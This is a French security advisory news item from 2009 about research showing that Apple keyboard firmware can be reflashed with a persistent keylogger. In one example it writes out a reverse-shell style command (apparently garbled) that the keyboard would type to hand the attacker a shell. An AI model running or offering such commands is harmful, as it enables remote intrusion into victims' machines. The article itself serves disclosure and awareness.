Rechercher
Contactez-nous Suivez-nous sur Twitter En francais English Language
 











Abonnez-vous gratuitement à notre NEWSLETTER

Newsletter FR

Newsletter EN

Vulnérabilités

Se désabonner

XMCO : Des chevaux de Troie peuvent être installés sur un clavier Apple

août 2009 par XMCO PARTNERS

Apple Keyboards Vulnerable to Firmware Hack

 Date : 03 Aout 2009

 Description :

De nos jours, même les claviers sont équipés d’un processeur et de mémoire vive. Les claviers Apple ne font pas exception à la règle avec leurs 8 kilo-octets de mémoire flash et leurs 256 octets de mémoire vive. K. Chen, un chercheur de l’université Georgia Institute of Technology, a trouvé un moyen très simple d’installer un keylogger à l’intérieur d’un clavier Apple.

Les keyloggers sont des logiciels ou matériels permettant d’enregistrer les touches pressées par un utilisateur.

Lors de sa présentation à la récente Black Hat 2009 de Las Vega, le chercheur a démontré qu’il était possible d’utiliser ces quelques octets de mémoire afin d’y installer un programme malveillant. Pour parvenir à ses fins, K. Chen utilise un outil fourni par Apple même, afin d’installer son code malicieux dans le clavier. Cet outil, nommé "HIDFirmwareUpdaterTool", est à la base destiné à mettre à jour le firmware de l’appareil.

SemiAccurate, site d’informations sur les nouvelles technologies, explique qu’il est très simple d’installer un code malveillant au sein du clavier : "Une fois l’outil lancé, il suffit de mettre un point d’arrêt, de copier-coller le code dans l’image du firmware en mémoire, c’est tout. Le clavier sera alors compromis."

De plus le programme en question est très difficile à enlever : ni remplacer les piles, ni redémarrer l’ordinateur, ni même ré-installer le système d’exploitation ne permettra d’enlever le logiciel malveillant. Ce type de malware est indétectable par les programmes traditionnels, et passe outre le TPM (Trusted Platform Module). En effet, aux yeux de ces derniers, le malware ne représente que l’utilisateur qui tape au clavier... Par exemple, le malware installé sur le clavier pourrait envoyer les commandes suivantes à l’ordinateur : touche "Espace", écrire "terminal", touche "Entrée", puis écrire "exec /bin/sh 0&0 2>&0" touche "Entrée", où 127.0.0.1 représente l’adresse ip du pirate. Cette suite de commande connecte la victime à l’ordinateur du pirate afin que ce dernier puisse saisir des commandes.

SemiAccurate insiste sur le fait qu’Apple devrait corriger cette vulnérabilité au plus vite, cette dernière étant exploitable à distance par le biais de sites malveillants. Cependant, cette faille de sécurité reste particulièrement difficile à exploiter lorsque l’on ne sait pas où chercher.

K. Chen déclare pouvoir écrire un outil qui permettrait de verrouiller le firmware, mais il préfère attendre une solution officielle venant d’Apple.

 Référence :

http://www.blackhat.com/presentations/bh-usa-09/CHEN/BHUSA09-Chen-RevAppleFirm-PAPER.pdf

http://www.osnews.com/story/21933/Apple_Keyboards_Vulnerable_to_Firmware_Hack

 Lien extranet XMCO Partners :

http://xmcopartners.com/veille/client/index.xmco?nv=1249302443


Voir les articles précédents

    

Voir les articles suivants